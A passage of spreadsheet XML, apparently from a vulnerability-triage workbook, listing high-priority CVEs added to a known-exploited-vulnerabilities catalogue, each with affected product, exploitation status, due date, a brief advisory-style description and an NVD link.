      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains a missing authentication for critical function vulnerability which allows kernel memory disclosure and denial of service in the btest service.</t>
        </is>
      </c>
      <c r="T9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67277</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-75650</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.021</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>adobe:commerce and magento</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>Adobe Commerce and Magento Open Source contain an improper neutralization of special elements used in a template engine vulnerability that could allow an attacker to execute arbitrary code.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-75650</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76460</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>cisco:identity services engine</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S1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1" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76460</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76461</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
      <c r="F12" s="5" t="inlineStr"/>
      <c r="G12" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H12" s="5" t="n">
        <v>0.02</v>
      </c>
      <c r="I12" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J12" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K12" s="5" t="inlineStr">
        <is>
          <t>cisco:secure email gateway</t>
        </is>
      </c>
      <c r="L12" s="5" t="inlineStr"/>
      <c r="M12" s="5" t="inlineStr"/>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr"/>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr"/>
      <c r="S12" s="5" t="inlineStr">
        <is>
          <t>Cisco AsyncOS software for Cisco Secure Email Gateway (SEG) contains a SQL injection vulnerability that could allow an unauthenticated, remote attacker to execute arbitrary commands with root privileges on the underlying operating system.</t>
        </is>
      </c>
      <c r="T12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76461</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85706</t>
        </is>
      </c>
      <c r="D13" s="5" t="inlineStr"/>
      <c r="E13" s="5" t="inlineStr"/>
      <c r="F13" s="5" t="inlineStr"/>
      <c r="G13" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H13" s="5" t="n">
        <v>0.12</v>
      </c>
      <c r="I13" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J13" s="5" t="inlineStr">
        <is>
          <t>gitlab</t>
        </is>
      </c>
      <c r="K13" s="5" t="inlineStr">
        <is>
          <t>gitlab:community edition and enterprise edition</t>
        </is>
      </c>
      <c r="L13" s="5" t="inlineStr"/>
      <c r="M13" s="5" t="inlineStr"/>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr"/>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr"/>
      <c r="S13"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3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85706</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86060</t>
        </is>
      </c>
      <c r="D14" s="5" t="inlineStr"/>
      <c r="E14" s="5" t="inlineStr"/>
      <c r="F14" s="5" t="inlineStr"/>
      <c r="G14" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H14" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="I14" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr">
        <is>
          <t>mikrotik:routeros</t>
        </is>
      </c>
      <c r="L14" s="5" t="inlineStr"/>
      <c r="M14" s="5" t="inlineStr"/>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr"/>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>2026-09-13</t>
        </is>
      </c>
      <c r="R14" s="5" t="inlineStr"/>
      <c r="S14" s="5" t="inlineStr">
        <is>
          <t>MikroTik RouterOS contains an improper neutralization of argument delimiters in a command vulnerability which allows an attacker to change the trusted RouterOS policy mask, leading to privilege escalation.</t>
        </is>
      </c>
      <c r="T14" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86060</t>
        </is>
      </c>
    </row>
    <row r="15">
      <c r="A15" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B15" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C15" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86218</t>
        </is>
      </c>
      <c r="D15" s="5" t="inlineStr"/>
      <c r="E15" s="5" t="inlineStr"/>
      <c r="F15" s="5" t="inlineStr"/>
      <c r="G15" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H15" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="I15" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J15" s="5" t="inlineStr"/>
      <c r="K15" s="5" t="inlineStr">
        <is>
          <t>n-able:n-central</t>
        </is>
      </c>
      <c r="L15" s="5" t="inlineStr"/>
      <c r="M15" s="5" t="inlineStr"/>
      <c r="N15" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O15" s="5" t="inlineStr"/>
      <c r="P15" s="5" t="inlineStr"/>
      <c r="Q15" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="R15" s="5" t="inlineStr"/>
      <c r="S15" s="5" t="inlineStr">
        <is>
          <t>N-able N-central contains a static code injection vulnerability that could allow for pre-authentication remote code execution.</t>
        </is>
      </c>
      <c r="T15" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86218</t>
        </is>
      </c>
    </row>
    <row r="16">
      <c r="A16" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B16" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C16" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87886</t>
        </is>
      </c>
      <c r="D16" s="5" t="inlineStr"/>
      <c r="E16" s="5" t="inlineStr"/>
      <c r="F16" s="5" t="inlineStr"/>
      <c r="G16" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H16" s="5" t="inlineStr"/>
      <c r="I16" s="5" t="inlineStr"/>
      <c r="J16" s="5" t="inlineStr"/>
      <c r="K16" s="5" t="inlineStr">
        <is>
          <t>acronis:backup</t>
        </is>
      </c>
      <c r="L16" s="5" t="inlineStr"/>
      <c r="M16" s="5" t="inlineStr"/>
      <c r="N16" s="5" t="inlineStr">
        <is>
          <t>KEV</t>
        </is>
      </c>
      <c r="O16" s="5" t="inlineStr"/>
      <c r="P16" s="5" t="inlineStr"/>
      <c r="Q16" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R16" s="5" t="inlineStr"/>
      <c r="S16" s="5" t="inlineStr">
        <is>
          <t>Acronis Backup plugin for cPanel &amp; WHM and extension for Plesk contains an incorrect default permissions vulnerability that could allow for privilege escalation.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87886</t>
        </is>
      </c>
    </row>
  </sheetData>
  <autoFilter ref="A1:T16"/>
  <conditionalFormatting sqref="E2:E1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2026-09-12</t>
        </is>
      </c>
      <c r="Q2" s="5" t="inlineStr">
        <is>
          <t>2026-09-14</t>
        </is>
      </c>
      <c r="R2" s="5" t="inlineStr">
        <is>
          <t>CWE-269, CWE-862</t>
        </is>
      </c>
      <c r="S2" s="5" t="inlineStr">
        <is>
          <t>A condition in the ScreenConnect client may allow files to be transferred and executed through an active remote session without authorization or Host confirmation in certain circumstances. ScreenConnect servers are not impacted.</t>
        </is>
      </c>
      <c r="T2" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84869</t>
        </is>
      </c>
    </row>
    <row r="3">
      <c r="A3" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B3" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C3" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81963</t>
        </is>
      </c>
      <c r="D3" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E3" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F3" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G3" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H3" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I3" s="5" t="inlineStr"/>
      <c r="J3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K3" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="L3" s="5" t="inlineStr"/>
      <c r="M3" s="5" t="inlineStr"/>
      <c r="N3" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O3" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P3" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q3" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R3" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-59</t>
        </is>
      </c>
      <c r="S3" s="5" t="inlineStr">
        <is>
          <t>Improper link resolution before file access ('link following') in Windows Update Stack allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81963</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85880</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H4" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K4" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022</t>
        </is>
      </c>
      <c r="L4" s="5" t="inlineStr"/>
      <c r="M4" s="5" t="inlineStr"/>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>KEV, NVD</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>2026-09-22</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-908</t>
        </is>
      </c>
      <c r="S4" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows ALPC allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85880</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-58704</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H5" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I5" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr">
        <is>
          <t>google:pixel</t>
        </is>
      </c>
      <c r="L5" s="5" t="inlineStr"/>
      <c r="M5" s="5" t="inlineStr"/>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>2026-09-19</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t>CWE-285, CWE-693</t>
        </is>
      </c>
      <c r="S5" s="5" t="inlineStr">
        <is>
          <t>Google Pixel devices contain an improper authorization vulnerability in the cellular modem. A logic error may allow an attacker to bypass permission checks and escalate privileges.</t>
        </is>
      </c>
      <c r="T5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-58704</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87491</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>CISA-ADP</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H6" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="I6" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr">
        <is>
          <t>google:chromium v8</t>
        </is>
      </c>
      <c r="L6" s="5" t="inlineStr"/>
      <c r="M6" s="5" t="inlineStr"/>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>2026-09-23</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr"/>
      <c r="S6"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6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-87491</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-25249</t>
        </is>
      </c>
      <c r="D7" s="5" t="inlineStr"/>
      <c r="E7" s="5" t="inlineStr"/>
      <c r="F7" s="5" t="inlineStr"/>
      <c r="G7" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H7" s="5" t="n">
        <v>0.024</v>
      </c>
      <c r="I7" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J7" s="5" t="inlineStr">
        <is>
          <t>fortinet</t>
        </is>
      </c>
      <c r="K7" s="5" t="inlineStr">
        <is>
          <t>fortinet:multiple products</t>
        </is>
      </c>
      <c r="L7" s="5" t="inlineStr"/>
      <c r="M7" s="5" t="inlineStr"/>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr"/>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr"/>
      <c r="S7" s="5" t="inlineStr">
        <is>
          <t>Fortinet FortiOS, FortiSwitchManager, and FortiSASE contain a heap-based buffer overflow vulnerability that allows an attacker to execute unauthorized code or commands via specially crafted packets.</t>
        </is>
      </c>
      <c r="T7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-25249</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19490</t>
        </is>
      </c>
      <c r="D8" s="5" t="inlineStr"/>
      <c r="E8" s="5" t="inlineStr"/>
      <c r="F8" s="5" t="inlineStr"/>
      <c r="G8" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H8" s="5" t="n">
        <v>0.056</v>
      </c>
      <c r="I8" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J8" s="5" t="inlineStr">
        <is>
          <t>citrix</t>
        </is>
      </c>
      <c r="K8" s="5" t="inlineStr">
        <is>
          <t>citrix:netscaler</t>
        </is>
      </c>
      <c r="L8" s="5" t="inlineStr"/>
      <c r="M8" s="5" t="inlineStr"/>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr"/>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S8"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8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19490</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-20079</t>
        </is>
      </c>
      <c r="D9" s="5" t="inlineStr"/>
      <c r="E9" s="5" t="inlineStr"/>
      <c r="F9" s="5" t="inlineStr"/>
      <c r="G9" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H9" s="5" t="n">
        <v>0.758</v>
      </c>
      <c r="I9" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J9" s="5" t="inlineStr">
        <is>
          <t>cisco</t>
        </is>
      </c>
      <c r="K9" s="5" t="inlineStr">
        <is>
          <t>cisco:secure firewall management center (fmc) and security cloud control (scc) firewall management</t>
        </is>
      </c>
      <c r="L9" s="5" t="inlineStr"/>
      <c r="M9" s="5" t="inlineStr"/>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr"/>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>2026-09-12</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr"/>
      <c r="S9"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9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-20079</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42016</t>
        </is>
      </c>
      <c r="D10" s="5" t="inlineStr"/>
      <c r="E10" s="5" t="inlineStr"/>
      <c r="F10" s="5" t="inlineStr"/>
      <c r="G10" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H10" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I10" s="5" t="inlineStr">
        <is>
          <t>active</t>
        </is>
      </c>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L10" s="5" t="inlineStr"/>
      <c r="M10" s="5" t="inlineStr"/>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr"/>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr"/>
      <c r="S10" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an incorrect authorization vulnerability that leads to a privilege escalation attack due to a validation check of the token signature/issuer and not the token’s scope.</t>
        </is>
      </c>
      <c r="T10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42016</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-42018</t>
        </is>
      </c>
      <c r="D11" s="5" t="inlineStr"/>
      <c r="E11" s="5" t="inlineStr"/>
      <c r="F11" s="5" t="inlineStr"/>
      <c r="G11" s="5" t="inlineStr">
        <is>
          <t>Yes</t>
        </is>
      </c>
      <c r="H11" s="5" t="n">
        <v>0.008999999999999999</v>
      </c>
      <c r="I11" s="5" t="inlineStr">
        <is>
          <t>none</t>
        </is>
      </c>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr">
        <is>
          <t>jfrog:artifactory</t>
        </is>
      </c>
      <c r="L11" s="5" t="inlineStr"/>
      <c r="M11" s="5" t="inlineStr"/>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>KEV, Vulnrichment</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr"/>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>2026-09-25</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr"/>
      <c r="S11" s="5" t="inlineStr">
        <is>
          <t>JFrog Artifactory contains an improper authentication vulnerability that could return an internal anonymous-user token to an unauthenticated caller when anonymous access is disabled, potentially exposing sensitive resources.</t>
        </is>
      </c>
      <c r="T11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-42018</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P1 - Act now</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>Added to KEV</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67277</t>
        </is>
      </c>
      <c r="D12" s="5" t="inlineStr"/>
      <c r="E12" s="5" t="inlineStr"/>
